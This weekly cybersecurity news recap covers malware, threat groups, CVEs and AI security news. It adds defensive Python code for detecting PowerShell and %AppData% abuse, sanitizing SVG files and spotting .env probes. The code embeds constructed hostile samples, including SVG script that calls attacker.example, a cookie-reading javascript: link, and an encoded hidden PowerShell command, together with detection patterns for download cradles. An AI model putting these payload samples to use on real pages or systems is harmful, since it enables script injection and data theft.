Our weekly cybersecurity news recap keeps you posted on the latest developments, exposures, advances, incidents, threats, and stories in the field.
It highlights new cyber threats and possible mitigations, such as emerging malicious techniques that could be used to compromise your systems.
Staying up to date helps, because you do not have to wait for something to happen before putting preventive measures in place.
Constant awareness also makes it easier to build a comprehensive knowledge base of risk areas, which helps protect any network against an ever-changing threat environment.
BunnyLoader 3.0
BunnyLoader 3.0 is the latest version of an evolving malware loader that can log keystrokes, steal credentials, and target cryptocurrency wallets.
On February 11, 2024, the creator of BunnyLoader released version 3.0, claiming a 90% performance boost.
The malware has consistently improved its tactics and evasion techniques, hindering detection and analysis and posing a significant threat.
Workings Of MalSync Malware Unveiled
The report on DuckTail and SYS01, collectively tracked as MalSync, shows malware aimed at stealing social media credentials, extracting data, and evading detection.
It contacts its command-and-control server for updates and instructions, uses DLL hijacking, and follows a layered attack strategy in which scheduled tasks download additional malware.
Its activity becomes apparent through unusual PowerShell command-line activity and the presence of specific executables in the %AppData% directory.
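The two observables named above (odd PowerShell command lines and executables running out of %AppData%) are the kind of thing a detection rule can key on. The following is an added example, not code from the report or from any vendor, that runs such a rule over a handful of constructed process-creation events. The field names (pid, image, command_line) and the sample events, including the base64 blob, are assumptions modelled on typical EDR telemetry, not real indicators from the MalSync report.

```python
import re
from collections import namedtuple

# Constructed sample events (assumption: Sysmon/EDR-style process creation records).
Event = namedtuple("Event", "pid image command_line")

SAMPLE_EVENTS = [
    Event(1001, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          "powershell.exe -NoP -W Hidden -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAKQA="),
    Event(1002, r"C:\Users\alice\AppData\Roaming\Updater\svchost.exe",
          r'"C:\Users\alice\AppData\Roaming\Updater\svchost.exe" --silent'),
    Event(1003, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          "powershell.exe Get-ChildItem C:\\temp"),
    Event(1004, r"C:\Program Files\Mozilla Firefox\firefox.exe",
          '"C:\\Program Files\\Mozilla Firefox\\firefox.exe"'),
]

# PowerShell command-line traits that are rare in admin use but common in loaders.
POWERSHELL_FLAGS = [
    (re.compile(r"(?i)(^|\s)-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}"), "encoded command"),
    (re.compile(r"(?i)(^|\s)-w(indowstyle)?\s+hidden"), "hidden window"),
    (re.compile(r"(?i)\b(iex|invoke-expression|downloadstring|downloadfile|frombase64string)\b"), "download/eval cradle"),
    (re.compile(r"(?i)(^|\s)-(nop|noprofile)\b"), "profile bypass"),
]

# Executables launched from the per-user AppData tree (Roaming or Local).
APPDATA_EXE = re.compile(r"(?i)\\AppData\\(Roaming|Local)\\.*\.exe$")


def analyze(events):
    """Return [{"pid", "image", "reasons"}] for every event that trips at least one rule."""
    findings = []
    for ev in events:
        reasons = []
        exe = ev.image.rsplit("\\", 1)[-1].lower()
        if exe in ("powershell.exe", "pwsh.exe"):
            for pattern, label in POWERSHELL_FLAGS:
                if pattern.search(ev.command_line):
                    reasons.append("powershell: " + label)
        if APPDATA_EXE.search(ev.image):
            reasons.append("executable running from %AppData%")
        if reasons:
            findings.append({"pid": ev.pid, "image": ev.image, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for hit in analyze(SAMPLE_EVENTS):
        print(hit["pid"], hit["image"], ", ".join(hit["reasons"]))
```

On the sample set, the hidden, encoded PowerShell launch and the %AppData% executable are flagged while the ordinary PowerShell and browser launches are not. In production the AppData rule needs an allow-list for legitimate per-user installers (several mainstream applications install there), so treat it as a triage signal rather than a standalone alert.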
Grandoreiro Banking Malware
With help from cybersecurity firm Group-IB, INTERPOL, and Brazilian authorities, law enforcement disrupted the 'Grandoreiro' banking trojan by analyzing malware samples and identifying the attackers' infrastructure.
Five administrators were arrested in January 2024. The trojan has been active since 2017 and mainly targeted Spanish-speaking countries in Latin America.
It used email-based social engineering to steal financial information, with spyware-like capabilities such as keylogging and screen hijacking.
The operation combined malware analysis, identification of the command-and-control server's IP address, and disruption of the criminal enterprise.
Hackers Breach Israeli Nuclear Facility Networks
Hackers claim to have breached the networks of an Israeli nuclear facility, boasting of obtaining thousands of documents including PDFs, emails, and presentations.
Cybersecurity professionals view the claims as exaggerated, as the hackers imply a level of control that the evidence does not support.
This incident raises concerns about the security of critical infrastructure and highlights the ongoing threats posed by cyberattacks on sensitive facilities.
Kimsuky Group Equipped To Exploit Windows Help Files
The report discusses the Kimsuky group's ability to exploit Windows help files, with particular attention to its adaptability and sophistication.
The report attributes the activity with 'moderate confidence', noting commonalities with previous campaigns, and underlines the need for organizations to remain watchful and proactive.
The group's use of help files is a reminder that threats are constantly changing and that defenses against advanced attacks like this one must keep pace.
Invisible Backdoor Attack Dubbed DEBA
DEBA is a backdoor attack on deep neural networks (DNNs), designed by security researchers, that implants invisible triggers during model training.
It uses singular value decomposition (SVD) to embed the hidden malicious functionality, achieving high attack success rates while keeping poisoned images visually indistinguishable from clean ones.
DEBA is designed to bypass existing defenses, signaling an era of backdoor attacks that are difficult to identify and that undermine the trustworthiness of DNNs.
The attack takes effect during training, turning the poisoned samples into stealthy, imperceptible triggers, and thus poses substantial challenges to security and credibility across many domains.
TinyTurla Evolved TTPs
TinyTurla is a backdoor used by Turla, a Russian espionage group that has been active since 2008 and constantly changes its practices.
Recently, Cisco Talos researchers found that the group is using the TinyTurla-NG (TTNG) implant in an ongoing campaign.
Turla's constant adaptation of its techniques shows that security measures must evolve to keep pace with changing threats and vulnerabilities.
Weaponized SVG Files
Because SVG files can carry embedded scripts and slip past security controls, attackers are increasingly using weaponized SVG files in attacks.
SVG files have been used for malware distribution since 2015, in infections involving ransomware and malware families such as Ursnif and QakBot.
These files can pull in malicious content from external sources and incorporate HTML smuggling techniques.
Defending against this vector for malicious code execution requires better controls on how SVG files are accepted, served, and rendered.
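SVG is XML, so the dangerous parts (script elements, event-handler attributes, javascript: links, remote resource references, and foreignObject blocks that smuggle HTML) can be stripped before a file is stored or served. The following sanitizer is an added example written for this page, not code from any of the cited reports or vendors; the SAMPLE_SVG input is constructed, and the hostname attacker.example is a placeholder.

```python
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
ET.register_namespace("", SVG_NS)       # serialize svg elements without an ns0: prefix
ET.register_namespace("xlink", XLINK_NS)

# Elements that execute code or embed arbitrary HTML inside an SVG.
BANNED_TAGS = {"script", "foreignObject", "iframe", "embed", "object"}
HREF_ATTRS = ("href", "{%s}href" % XLINK_NS)
# Elements that fetch and render a referenced resource (remote content delivery).
RESOURCE_TAGS = {"use", "image", "feImage"}

# Constructed sample (assumption): one file combining the tricks described above.
SAMPLE_SVG = """<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200">
  <rect width="200" height="200" fill="#eee" onload="fetch('https://attacker.example/c2')"/>
  <script>location='https://attacker.example/payload.html'</script>
  <a xlink:href="javascript:alert(document.cookie)"><text x="20" y="100">Open invoice</text></a>
  <image xlink:href="https://attacker.example/stage2.svg" width="50" height="50"/>
  <foreignObject width="100" height="100"><div xmlns="http://www.w3.org/1999/xhtml">smuggled HTML</div></foreignObject>
  <circle cx="100" cy="100" r="40" fill="steelblue"/>
</svg>"""


def _local(tag):
    """Strip the {namespace} prefix ElementTree puts on tag and attribute names."""
    return tag.split("}", 1)[-1]


def _bad_href(tag, value):
    # Collapse whitespace first: "java\nscript:" is still javascript: to a browser.
    v = "".join(value.split()).lower()
    if v.startswith(("javascript:", "vbscript:", "data:text/html")):
        return True
    # Remote loading on resource elements: content smuggled in from another host.
    return tag in RESOURCE_TAGS and v.startswith(("http://", "https://", "//"))


def sanitize_svg(svg_text):
    """Return (clean_svg_text, removed) where removed lists what was stripped."""
    root = ET.fromstring(svg_text)
    if _local(root.tag) != "svg":
        raise ValueError("not an SVG document")
    parents = {child: parent for parent in root.iter() for child in parent}
    removed = []
    for el in list(root.iter()):
        tag = _local(el.tag)
        if tag in BANNED_TAGS:
            parents[el].remove(el)          # drops the element and its whole subtree
            removed.append("<%s>" % tag)
            continue
        for attr in list(el.attrib):
            name = _local(attr).lower()
            if name.startswith("on"):        # onload, onclick, onmouseover, ...
                del el.attrib[attr]
                removed.append("@" + name)
            elif attr in HREF_ATTRS and _bad_href(tag, el.attrib[attr]):
                del el.attrib[attr]
                removed.append("@" + name)
    return ET.tostring(root, encoding="unicode"), removed


if __name__ == "__main__":
    clean, stripped = sanitize_svg(SAMPLE_SVG)
    print("removed:", stripped)
    print(clean)
```

Because the output is re-serialized from the parsed tree, any DOCTYPE and entity declarations in the input are dropped as well. The sanitizer does not inspect CSS (a style element with url() imports) and cannot help once a file has been rendered as a page rather than an image, so the safer deployment for user-supplied SVG remains serving it only through an img tag or with a restrictive Content-Security-Policy, with this stripping as a second layer.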
Hackers Exploiting Microsoft Office Templates
Microsoft Office templates have been abused to run malicious code in a campaign named "PhantomBlu", which targets U.S. organizations with phishing emails disguised as messages from an accounting service.
The attackers send emails with password-protected document attachments and ask recipients to open them to view a "monthly salary report".
They rely on social engineering and advanced evasion techniques, using a PowerShell dropper and the NetSupport RAT to deploy malicious code. Awareness of such threats and caution with email attachments remain important for safeguarding sensitive information.
900+ Websites Exposing 10M+ Passwords
The report describes a database exposing over 124 million records, including names, emails, phone numbers, passwords (a significant portion in plaintext), and billing information from more than 900 websites.
Several notable websites were affected, highlighting the alarming scale of sensitive data exposed.
Novel Script-Based Attack
The "Power VBScript Attack" report describes a new script-based attack that exploits PowerShell and VBScript.
It is a new instance of code reuse, combining older stagers with calls to certain APIs to connect to Dropbox.
In this script-based attack chain, the Kimsuky group has moved beyond its previous focus on South Korean victims, showing a development in its operations.
Azorult Malware Abuses Google Sites
Azorult is an information stealer discovered in 2016 that can steal sensitive data such as user credentials, browser data, and cryptocurrency wallet information.
The malware uses tactics such as HTML smuggling via Google Sites to bypass detection and steal data.
The report also highlights Azorult's emergence as a major threat targeting varied types of confidential information, including crypto wallets and personal documents.
Andariel Hackers Leveraging Remote Tools
Researchers have discovered a new remote access trojan (RAT) called EarlyRAT used by Andariel, a subgroup of North Korea's state-sponsored Lazarus group.
Andariel is known for using the DTrack modular backdoor, which has been associated with activities such as intellectual property theft and ransomware deployment, including Maui.
EarlyRAT collects system information and runs commands on compromised devices; knowing these behaviors helps defenders identify compromises.
The RAT was found while investigating an Andariel campaign that exploited Log4j vulnerabilities and distributed malware via phishing documents.
Hackers Attacking Critical US Water Systems
U.S. critical water systems have recently become a target for hackers, prompting the White House to call for stronger cybersecurity.
The White House has asked state governments to evaluate and upgrade cybersecurity practices across their water systems to minimize the risks.
Groups such as Volt Typhoon pose significant cyber risks to water infrastructure, underlining the need for strong incident response plans as well as basic measures such as updating software and changing default passwords.
Tor Unveils WebTunnel
WebTunnel is a new bridge type launched by the Tor Project to fight internet censorship. Users can obtain a WebTunnel bridge from the Tor Project's Bridges website and configure it in Tor Browser to bypass censorship and filtering.
CISA, NSA, FBI Warn of Volt Typhoon Attacks
CISA, NSA, and the FBI, along with international partners, have issued an advisory about the threat group "Volt Typhoon", linked to the People's Republic of China, which targets U.S. critical infrastructure.
The advisory highlights the group's activities, successful compromises, and the defensive actions needed to protect national security.
Organizations are urged to prioritize cybersecurity measures, use intelligence-informed tools, and align performance management with cyber goals to mitigate the threat effectively.
AcidPour Attacking Linux Systems
SentinelLabs researchers have found a new malware variant called AcidPour that targets Linux systems running on x86 architecture.
It is an expanded variant of the known "AcidRain" wiper and was discovered in a suspicious Linux binary uploaded from Ukraine.
Its predecessor AcidRain disrupted services across Europe during Russia's invasion of Ukraine in 2022.
The discovery shows how exposed Linux systems are to such threats, underlining the need for strong security measures for servers, cloud environments, and IoT devices.
Unsaflok Vulnerability
The Saflok electronic RFID locks in question are commonplace in hotels and multi-family housing in 131 countries.
The vulnerability, dubbed Unsaflok, enables attackers to use forged keycards to enter over three million hotel rooms worldwide.
The finding has raised concerns about the security of hotels and residential buildings, requiring significant updates to locks, keycards, and front-desk software to address the vulnerability.
TeamCity Vulnerability
Threat actors are exploiting two vulnerabilities in JetBrains TeamCity, CVE-2024-27198 and CVE-2024-27199, to deploy ransomware, coinminers, and backdoors.
These flaws let attackers bypass authentication, putting server resources and sensitive data at risk and potentially disrupting critical operations. Rapid7 discovered the bugs, which were fixed in version 2023.11.4.
Publicly available proof-of-concept exploits raise the risk of exploitation further, so users are urged to update their systems.
One-Click AWS Vulnerability
The Tenable Research report "One-Click AWS Vulnerability" describes a significant flaw in the AWS Managed Workflows for Apache Airflow service, dubbed FlowFixation.
The vulnerability could have allowed attackers to take control of a user's web management panel with a single click, leading to remote code execution and lateral movement within the victim's cloud environment.
The investigation also exposed misconfigurations at other major cloud providers such as Azure and Google Cloud Platform, underlining the importance of a strong security posture in cloud configuration.
Critical Zoom Clients Flaw
Zoom Desktop Client for Windows, Zoom VDI Client for Windows, and Zoom Meeting SDK for Windows were found to have a vulnerability (CVE-2024-24691) that allows an unauthenticated attacker to escalate privileges via network access.
The bug is classified as improper input validation, carries a CVSS score of 9.6, and can compromise system confidentiality, integrity, and availability.
Korenix JetI/O 6550 Vulnerability
The report describes a serious vulnerability, CVE-2024-2371, in Korenix JetI/O 6550 industrial Ethernet devices that permits unauthorized access to sensitive information in industrial control systems.
Attackers exploit flaws in the device's Simple Network Management Protocol (SNMP) implementation to obtain vital information such as configuration details and network topology.
This gap poses a major risk to the security and integrity of industrial systems and calls for strong protective measures in industrial environments.
To protect critical infrastructure, organizations should revisit and update their security protocols and watch for attempts to exploit the flaw.
133,000+ Vulnerable FortiOS/FortiProxy Instances
A critical vulnerability in Fortinet's FortiOS and FortiProxy, tracked as CVE-2024-21762, affects over 133,000 exposed devices globally.
The flaw allows remote attackers to execute arbitrary code via specially crafted HTTP requests. It is rated 9.6 on the CVSS scale and is believed to have been exploited in the wild.
Users are strongly advised to update FortiOS and FortiProxy to the recommended fixed versions.
Critical RCE Vulnerability in Fortra FileCatalyst
The advisory describes a critical RCE vulnerability in Fortra FileCatalyst Workflow with a CVSSv3.1 score of 9.8, endangering confidentiality, integrity, and availability.
Fortra has patched the vulnerability, CVE-2024-25153, in FileCatalyst Workflow version 5.1.6 Build 114 and above, and advises users to upgrade to mitigate the risk.
The flaw allows unauthenticated attackers to run arbitrary code on affected servers, making timely updates essential.
Chrome 123
Chrome 123 has been released with patches for 12 security vulnerabilities, including high-severity issues such as CVE-2024-2625. The update is rolling out gradually to Windows, Mac, and Linux users.
The release highlights the role of external researchers who reported many of these vulnerabilities.
Google also credits its internal security work, including fuzzing and audits, as part of its commitment to protecting users.
Hackers are Selling Exploits for Foxit Reader
This report focuses on the sale of exploits for Foxit Reader by threat actors, underlining the importance of rapid vulnerability patching.
The fast pace of technological change makes it hard to stay ahead of even the most skilled attackers.
Ivanti RCE flaw
Ivanti Standalone Sentry versions 9.17.0, 9.18.0, 9.19.0, and earlier are affected by a critical Remote Code Execution (RCE) vulnerability.
Security researchers Vincent Hutsebaut and Pierre Vivegnis, among other stakeholders, worked with Ivanti to address the vulnerability.
The flaw enables attackers to run arbitrary commands on affected systems, underlining the importance of promptly installing security updates.
Hackers Steal Fingerprints with Friction Sound
A new attack named 'PrintListener' uses the sound generated by friction between a finger and a touchscreen to reconstruct the user's fingerprint.
The technique endangers fingerprint authentication systems and may expose personal and financial information. By recording and analyzing the distinctive friction sounds during video chats or phone calls, the method can produce prints that fool fingerprint-based biometric scanners.
Researchers demonstrated the attack successfully against a significant percentage of full and partial prints, revealing an alarming weakness in a widely trusted security measure.
Researchers Outline AI’s Malicious Red Teaming
The report examines harmful uses of AI by threat actors and the risks of AI technologies, with deepfakes, influence campaigns, and malware development as examples.
Researchers tested a number of AI models without fine-tuning to show the danger of deepfakes and social engineering attack vectors in 2024.
AI-generated fake media, impersonation of executives, and evasion of identification pose serious cybersecurity challenges, underpinning the need for strong security measures against emerging AI-driven threats.
ChatGPT & Bard Are Patching Up JavaScript Flaws
The study examines how cybersecurity experts assessed ChatGPT and Bard at fixing JavaScript vulnerabilities. ChatGPT's accuracy was higher than Bard's, at 71.66% versus 68.33%.
The research crafted prompts for twenty JavaScript bugs to test how well the AI models repair them automatically, and it underscores the usefulness of ChatGPT for addressing JavaScript vulnerabilities.
E-Root Admin Sentenced To 42 Months In Prison
Sandu Boris Diaconu, a 31-year-old Moldovan man, has been sentenced to 42 months in federal prison for operating E-Root Marketplace, a platform notorious for selling stolen computer credentials.
The platform sold unauthorized access to computers and servers around the world, including in the U.S. Diaconu's guilty plea revealed the extent of his involvement in a complex online fraud operation.
Microsoft Announces Major Teams Domain Change
Microsoft is making a major domain change, consolidating Microsoft 365 apps under the cloud.microsoft domain to improve security, administration, and user experience.
Developers of Teams apps need to update their apps to ensure they work on the new domain, teams.cloud.microsoft, by June 2024.
The migration involves changes to trusted domain lists and CDN endpoints to support seamless app integration. Apps that are not updated may fail to render on the new domain.
Androxgh0st Exploits SMTP Services
AndroxGh0st is malware known for targeting Laravel applications and stealing credentials for services such as AWS and Twilio from exposed .env files.
Initially referred to as an SMTP cracker, it breaches hosts by exploiting SMTP credentials and then deploys a web shell that scans for further vulnerabilities and extracts sensitive information from Laravel applications.
The malware is adaptable and offers menu options for several functions, such as awslimitcheck, sendgridcheck, and twilio_sender, all aimed at compromising hosts and extracting sensitive data.
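The entry point for this kind of campaign is a web-readable .env file, and requests for it stand out clearly in web server logs. The following is an added example for this page, not code from the AndroxGh0st report, that scans access-log lines for .env-style probes, groups them by client, and treats any probe that got a 2xx response as a confirmed exposure. The log lines and addresses are constructed, and the severity thresholds are assumptions.

```python
import re
from collections import defaultdict

# Apache/nginx combined log format (assumption: standard "%h %l %u %t \"%r\" %>s %b" prefix).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# /.env plus common copies and variants: /.env.bak, /.env.production, /app/.env, ...
ENV_PATH = re.compile(r"/\.env(\.[\w.-]+)?$", re.I)

# Constructed sample log (assumption): one scanner sweeping .env variants, one normal visitor.
SAMPLE_LOG = """
203.0.113.7 - - [21/Mar/2024:10:00:01 +0000] "GET /.env HTTP/1.1" 404 153 "-" "Mozilla/5.0"
203.0.113.7 - - [21/Mar/2024:10:00:02 +0000] "GET /laravel/.env HTTP/1.1" 404 153 "-" "Mozilla/5.0"
203.0.113.7 - - [21/Mar/2024:10:00:03 +0000] "POST /.env HTTP/1.1" 404 153 "-" "Mozilla/5.0"
203.0.113.7 - - [21/Mar/2024:10:00:04 +0000] "GET /.env.backup HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
198.51.100.4 - - [21/Mar/2024:10:05:00 +0000] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.4 - - [21/Mar/2024:10:05:01 +0000] "GET /images/logo.svg HTTP/1.1" 200 800 "-" "Mozilla/5.0"
""".strip().splitlines()


def find_env_probes(lines):
    """Return {client_ip: {"paths": ["GET /.env", ...], "served": [paths answered 2xx]}}."""
    probes = defaultdict(lambda: {"paths": [], "served": []})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                                   # skip unparseable lines
        path = m.group("path").split("?", 1)[0]        # ignore query string
        if not ENV_PATH.search(path):
            continue
        rec = probes[m.group("ip")]
        rec["paths"].append("%s %s" % (m.group("method"), path))
        if m.group("status").startswith("2"):
            rec["served"].append(path)                 # the secrets file was actually delivered
    return dict(probes)


def severity(rec):
    """critical: a .env file was served; high: sustained sweep; medium: a single probe."""
    if rec["served"]:
        return "critical"
    if len(rec["paths"]) >= 3:
        return "high"
    return "medium"


if __name__ == "__main__":
    for ip, rec in find_env_probes(SAMPLE_LOG).items():
        print(ip, severity(rec), rec)
```

A 404 on /.env is noise that every internet-facing host sees daily; the signal is the 200. A critical hit means every secret in that file (AWS keys, Twilio and SMTP credentials, the Laravel APP_KEY) must be rotated, not just the file removed. Prevention is simpler than detection: keep .env outside the document root, and have the web server deny all dotfile paths regardless of where they sit.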
US Welcomes Other Countries to Join Fight Against Spyware
The report reveals that a coalition of democratic states, including the United States and seventeen other countries, has formed to fight the abuse of commercial spyware.
The alliance aims to shield vulnerable people and institutions, support human rights defenders and journalists, and uphold democracy. Its focus is on ending the proliferation and misuse of spyware, which threatens national security, individual privacy, and the global information infrastructure.
To this end, the coalition emphasizes strong information sharing to better identify and track commercial surveillance tools used for intimidation and covert surveillance.
Microsoft Alerts DevOps Teams of Major Domain Change
Microsoft is notifying DevOps teams about a major domain change to a unified cloud.microsoft domain, intended to improve user experience and streamline development for Teams, Outlook, and Microsoft 365.
Apps that have not completed the migration will only function on teams.microsoft.com; on teams.cloud.microsoft an error message will direct users to the older domain.
The shift aims to improve the overall ecosystem and the security of web content embedded in Microsoft applications.
New GitHub AI-Powered Tool
GitHub has launched a feature named "code scanning autofix" that uses GitHub Copilot and CodeQL to fix code automatically.
It makes it easier to find and fix security bugs in code and automates part of code maintenance and security.
The solution combines AI functionality from GitHub Copilot with CodeQL's semantic code analysis engine to detect and correct security vulnerabilities. It should also help reduce the number of new vulnerabilities introduced, so more time can be devoted to securing the business during rapid development.
AttackGen: AI-Based Incident Response Tool
AttackGen is an AI-based incident response tool developed by Mathew Adams, a security architect at Santander UK. It uses large language models and the MITRE ATT&CK framework to create customized playbooks based on the threat actors a user selects.
The tool lets users choose the OpenAI API or Azure OpenAI Service for scenario generation, for data privacy and customization.
By integrating with the MITRE ATT&CK framework, AttackGen lets organizations focus on particular stages of the kill chain, such as 'Lateral Movement' or 'Exfiltration', and improve their defenses against advanced threats.